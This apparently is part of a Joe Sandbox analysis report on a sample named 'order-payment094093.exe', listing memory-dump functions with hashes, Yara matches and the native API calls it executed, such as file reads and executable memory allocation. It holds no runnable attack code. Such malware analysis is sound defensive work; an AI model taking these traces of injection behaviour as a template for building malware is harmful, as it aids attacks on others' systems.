Function 02D44443 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554417b6f7754232e362a2edb69e70735d58bd069b51d57d4a4a994c58ca9013
Instruction ID: 02bbc53b4b6b2f546b02447ecfb2d0dfe5c8de7b76f8c96957611865bcc7fe88
Opcode Fuzzy Hash: 554417b6f7754232e362a2edb69e70735d58bd069b51d57d4a4a994c58ca9013
Instruction Fuzzy Hash: A371E234E112099FCB48CFA9D584A9EFBF1FF88310F14956AE459AB324D730AA81CF50

Function 02D452B9 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187fd8f0251e22ba4d276147e00ad603869d21a41e6347bf9daba3f10d6f9f6b
Instruction ID: 3174b202c208bd6646a4549973823576096a0c2d7855d09abb7c0be606d79274
Opcode Fuzzy Hash: 187fd8f0251e22ba4d276147e00ad603869d21a41e6347bf9daba3f10d6f9f6b
Instruction Fuzzy Hash: 166146B0E1424ADBCB04CFA9E5815EEBBF2FF89304F54956AD055AB310DB749A42CF90

Function 02D45881 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e4df42c04d9079ebdbafabfeb28a890b7b5fc56c2b4dde66da3b7a19d918137
Instruction ID: 1afeb00833d81eb05ab375ec99b6589bb3564737f6554d8ec1c06d61487ea5fd
Opcode Fuzzy Hash: 4e4df42c04d9079ebdbafabfeb28a890b7b5fc56c2b4dde66da3b7a19d918137
Instruction Fuzzy Hash: 6E610E75E052099FCB08CFA9D5809EEFBF2EB89210F68942AD455B7324DB309E41CB64

Function 02D45890 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6728a314b4924813b55ace5f2a68c4704ca02a168613d7f7fd02d277a6babff
Instruction ID: e29186710d1dcb38108cc93a83d325072bf0dcbe71e5b4671d0e1379f728286f
Opcode Fuzzy Hash: b6728a314b4924813b55ace5f2a68c4704ca02a168613d7f7fd02d277a6babff
Instruction Fuzzy Hash: 5A61FF75E0520A9BCB04CFAAD5809EEFBF2FB88210F64942AD415B7314DB309E01CF64

Function 098BC6D0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975ad35153067ddec57304a931fe95d15e58780a95c80cb54152bf5b336ef89c
Instruction ID: 23dd83bd1f0c64e4d3c3dacc5e3b226aad6dff634fc1f62b29e0cc6ccf9bad62
Opcode Fuzzy Hash: 975ad35153067ddec57304a931fe95d15e58780a95c80cb54152bf5b336ef89c
Instruction Fuzzy Hash: 2D51D5B4E051199BCB04CFAAD5809EEFBF2FF88300F18D169D459AB355DB309942CB90

Function 0A042B80 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31094bdb2553872b27a64ad77b4fa1d759f6683e12b919998dd5e635b3e1e9e
Instruction ID: be60728f0a0766b693918aa7aebe99f3cbcd4bea8206053cf540b26ac831ff2f
Opcode Fuzzy Hash: b31094bdb2553872b27a64ad77b4fa1d759f6683e12b919998dd5e635b3e1e9e
Instruction Fuzzy Hash: 64510CB0E102598FDB15CFA9C5855AEFBF2FF89304F24816AD418A7315D7319942CFA1

Function 098B0040 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 318248fecba57a2d56ed22f2db776c885005f3caf74ac6ff2c6e14d0622ab688
Instruction ID: f9f6c0f080580e1f7e7e1d515f79add00963993ee021ca37c3382c25e5536840
Opcode Fuzzy Hash: 318248fecba57a2d56ed22f2db776c885005f3caf74ac6ff2c6e14d0622ab688
Instruction Fuzzy Hash: 605171B4D016588BEB68CF6AD854799BBF3AFC8304F14C1EAD40DAB264DB751A95CF00

Function 02D45C89 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec08e972f197cd91abb01cbb05be7dfdc4cba75d40056b738b83dfc098588a9
Instruction ID: 513231b776797e281bf3f1fd23d623156981a634490230a43b42253d761b81b0
Opcode Fuzzy Hash: 0ec08e972f197cd91abb01cbb05be7dfdc4cba75d40056b738b83dfc098588a9
Instruction Fuzzy Hash: 3F415D71E016588BEB68CF6B9D4439DFBF3AFC9300F14C1BA854DA6264EB340A458F51

Function 02D45679 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e448dc66a2ccd0125f6ed428e1b4008ae4d4c5fceaceada92a1b21da2c07e8
Instruction ID: 2909fc87210258fc5166796afc08f642aa8f2a933524da29f0135039d2146f44
Opcode Fuzzy Hash: 08e448dc66a2ccd0125f6ed428e1b4008ae4d4c5fceaceada92a1b21da2c07e8
Instruction Fuzzy Hash: 7F41E570E0464ADFCB08CFAAD481AAEBBB2FF98300F54C46AC415A7354D7349A42CF95

Function 02D45688 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cde6c002f74ce5bd423d87fd320ec9db24dbca7df4dd51cbde84ea722950070
Instruction ID: c35626b5114f515ddec6dcf39a69509bb741e8d7e5f463924c3161948a495362
Opcode Fuzzy Hash: 1cde6c002f74ce5bd423d87fd320ec9db24dbca7df4dd51cbde84ea722950070
Instruction Fuzzy Hash: F141D6B0E0464ADBCB04CFAAD541AAEBBF2FF98300F64D42AC415A7354D7349A41CFA4

Function 02D45AD8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852293583210b8af7426225be6de4a7ad1b04524e66fb2c10103686faf5a60dd
Instruction ID: fa0d40957b9d278c31599bd1f3bc1f18e3135f087bbbc0ef98ee77d4e21a2817
Opcode Fuzzy Hash: 852293583210b8af7426225be6de4a7ad1b04524e66fb2c10103686faf5a60dd
Instruction Fuzzy Hash: 2C41C4B0E046098FDB48CFA9D5806EEFBF2BB99300F14D56AC445B7354DB349A52CB64

Function 02D45AE8 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122055239.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d40000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfc7d5e31d0d7a134dd519a333cb44291fb421f5d20310f8ae5accd4c5d363a
Instruction ID: ba10e9e5e59170f2c47861bae3765eca3b5403c89e1204cdefe4920b307a65b4
Opcode Fuzzy Hash: 8bfc7d5e31d0d7a134dd519a333cb44291fb421f5d20310f8ae5accd4c5d363a
Instruction Fuzzy Hash: 2241B3B0E05609CFCB44CFA9D5806AEFBF2BB98200F54D569C419B7354DB309A42CF64

Function 0A046E18 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143910240.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a040000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0928bc41cceba2811a221526230e8672bbb772a8fd0c051b01f837978f43bde2
Instruction ID: 3163843288df022977ec0e575aef20ef446143fe48877225f6c5f1a1e04c5dc0
Opcode Fuzzy Hash: 0928bc41cceba2811a221526230e8672bbb772a8fd0c051b01f837978f43bde2
Instruction Fuzzy Hash: 8541A5B1D45628CBEB28CF66C8147DABAF6BF89304F04C5BAC80CA6255E7754A85CF50

Function 098B0006 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec76d52829d27d13ce46ec5ab6d840af4b002713b1d2690ad2e909d14b7c0ea
Instruction ID: d754e83c9c56e2cff067ccdedda2746d3ee243d7511e8e2d45dde5a408d3d383
Opcode Fuzzy Hash: 2ec76d52829d27d13ce46ec5ab6d840af4b002713b1d2690ad2e909d14b7c0ea
Instruction Fuzzy Hash: C441D9B1D057598BEB19CF2BC84478ABAF3AFC9200F18C1EAC408AA265DB750985CF51

Function 0544966C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9332a63bae58bf276660a10990a0455208534ee0af41f7d7598c0d23d180c069
Instruction ID: 136c4b69cbf00147245274bbcfe7c7d6274c3a5c0b6fbd6ad1d66223a260c5c2
Opcode Fuzzy Hash: 9332a63bae58bf276660a10990a0455208534ee0af41f7d7598c0d23d180c069
Instruction Fuzzy Hash: A73195B8D052199FDB10CFA9E984ADEFBF5AB49310F20942AE819B7310D374A945CF94

Function 054462F1 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f326cf0007c69c3268a1f54d100a0ff7bb096340d823a47530df4422862579c9
Instruction ID: 1b698b7a733d5eae992d0d766e67d678fae50b447965e5d407b338d3861f1d28
Opcode Fuzzy Hash: f326cf0007c69c3268a1f54d100a0ff7bb096340d823a47530df4422862579c9
Instruction Fuzzy Hash: 8531A534A803158FEB49DF51F8456AE7B79FB44350F904525FA055B3C5EB706881CF21

Function 0544B7E8 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133458331.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bf11b839afe4a7e29c86b5cd754a43a2fe9ee351a41a73f99e59b769115a88
Instruction ID: 4a8b912696151deb0532fd95ada5e18aeaeafa7ed53e03ba1c0a3d6d31784f4e
Opcode Fuzzy Hash: 34bf11b839afe4a7e29c86b5cd754a43a2fe9ee351a41a73f99e59b769115a88
Instruction Fuzzy Hash: F031A6B9D012189FDB10CFA9E984AEEFBF1BB49310F24946AE819B7310D334A945CF54

Function 098BA2E8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1445e50e82cca6a182fd9ac7d36e0c88abe60c517ef1f750247693d62cbdb6b
Instruction ID: 489407326440a018bb87ca4cd1e6c9498fa30eb9eaa34e3943b7cb294b77f19e
Opcode Fuzzy Hash: c1445e50e82cca6a182fd9ac7d36e0c88abe60c517ef1f750247693d62cbdb6b
Instruction Fuzzy Hash: 2A315AB4D05218EFCB18CFA9D984AEDBBF2BB89350F24912AE814BB350D7349941CF54

Function 098BA608 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0319716bfb9349e6b8d8dfed75c35b33677aba1be9bb462004937ff9887cc3c
Instruction ID: 3222e0b36c78a2a9197ec497a8ac22de8bf59612c85bee5df072b82cb157c564
Opcode Fuzzy Hash: a0319716bfb9349e6b8d8dfed75c35b33677aba1be9bb462004937ff9887cc3c
Instruction Fuzzy Hash: 832162B4D04208DFDB18CFAAD4446EEBBF1AB5A350F14E129E824BB350D7349945CF58

Function 098BA540 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2143059726.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_98b0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: de9b2ce441af24f92003e15a6d12c68811cf8e3d6a8813d057db6d5f5119a6c1
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: A3F042B5D0520C9F8F04DFA9D5418EEFBF2AB5E310F14A16AE814B7310E73599518FA8

Analysis Process: order-payment094093.exePID: 5016, Parent PID: 1136COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.7%
Total number of Nodes:	557
Total number of Limit Nodes:	72

Executed Functions

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0041A40B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: 6da5ff966a82deb92afaf7386fb2cdfb8098fde018879ff1f9b1821e645d73a3
Instruction ID: b97799258f32d92ed8f20816834484f231a3705603aa2e2606558ec01337469e
Opcode Fuzzy Hash: 6da5ff966a82deb92afaf7386fb2cdfb8098fde018879ff1f9b1821e645d73a3
Instruction Fuzzy Hash: A5F01DB2114049ABDB04DF99D880CEB77EDEF8C254B15864DF95C93205C635E855CBA0

Function 0041A45B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: rMA
API String ID: 2738559852-3963102562
Opcode ID: 3fb00369da6124b1a544a2443a4ba52901f272552e1365e6fee239d68047c5ed
Instruction ID: d9c33ef544d74d2dd14d286b5b9361658af43724cdf0665f7ac122e1f21c9dd9
Opcode Fuzzy Hash: 3fb00369da6124b1a544a2443a4ba52901f272552e1365e6fee239d68047c5ed
Instruction Fuzzy Hash: 0AC012B6200008AB9724DF88E880CF773A8EBCC620300860AF92C82A00D131D8118BA0

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: db86d6ca4e4d689ae99f97a2648eb6f1541ba8d6f6d2d40105462176a88759ce
Instruction ID: 4b16b4ee8acfcfecbe53381d5eb7a22f5ba55b2a01d6c7c43a71dd4d5ad2efc6
Opcode Fuzzy Hash: db86d6ca4e4d689ae99f97a2648eb6f1541ba8d6f6d2d40105462176a88759ce
Instruction Fuzzy Hash: 3CF05EB12001086BCB14DF88DC40EEB77ADEF8C754F108108BA0D97281C630E811CBA0

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Function 0041A48C Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8c241b0705453a70df4e12cc47cb0ecc13aa5849076ff0f4cbdb347e0ea2529e
Instruction ID: 76932b76cae27c70437dcc68b99f03bc869afc9aa36a162d9a7633bde0b397af
Opcode Fuzzy Hash: 8c241b0705453a70df4e12cc47cb0ecc13aa5849076ff0f4cbdb347e0ea2529e
Instruction Fuzzy Hash: 49E0C2B1200200BBD710DB94CC44EE77B29EF48760F248159F90CEB241C130E61187E0

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_order-payment094093.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Function 01262B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262B6A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71c06d5fdc06693205dfee10632c478894c1c2ed8e122b0f3f005f5384118b3d
Instruction ID: 914b4df0db6d2d2a6a3584f241687280005f1f3bb5a79ac3bae85ebe5017f70a
Opcode Fuzzy Hash: 71c06d5fdc06693205dfee10632c478894c1c2ed8e122b0f3f005f5384118b3d
Instruction Fuzzy Hash: DE90026121340003420571584418617400A97E0201B55C031E2014590DC53589916225

Function 01262BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262BFA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec6d7007ddeef07c5e3c1c8bdb1f5fda18a9d00e41c215db98b10420eb0bb0dc
Instruction ID: eb306b89aada229da58d6d6718de0a80c0cf5986c884302315a22df636c33b2d
Opcode Fuzzy Hash: ec6d7007ddeef07c5e3c1c8bdb1f5fda18a9d00e41c215db98b10420eb0bb0dc
Instruction Fuzzy Hash: 3790023121240802D2807158440864B000597D1301F95C025A1025654DCA258B5977A1

Function 01262AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262ADA

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3861fd79130a8767a33f3ee6e4a60117704f0ae4b749f4c3fad3def4efb881d0
Instruction ID: 08aa7991bd517d16b6ea3c6243f8884bf0f5fe5fe67559278925964e73ede826
Opcode Fuzzy Hash: 3861fd79130a8767a33f3ee6e4a60117704f0ae4b749f4c3fad3def4efb881d0
Instruction Fuzzy Hash: 51900435333400030305F55C070C5070047D7D5351355C031F3015550CD731CD715331

Function 01262D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262D3A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10c189a7e4bafd2ca4f720ba90778e44e3c6f42947e141a220a0c914b90f6f75
Instruction ID: 612b82226336d346b10522c58ff56f6a94a37261134e6e1054b72b3c43997862
Opcode Fuzzy Hash: 10c189a7e4bafd2ca4f720ba90778e44e3c6f42947e141a220a0c914b90f6f75
Instruction Fuzzy Hash: 7990022131240003D2407158541C6074005E7E1301F55D021E1414554CD92589565322

Function 01262D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01262D1A

Memory Dump Source

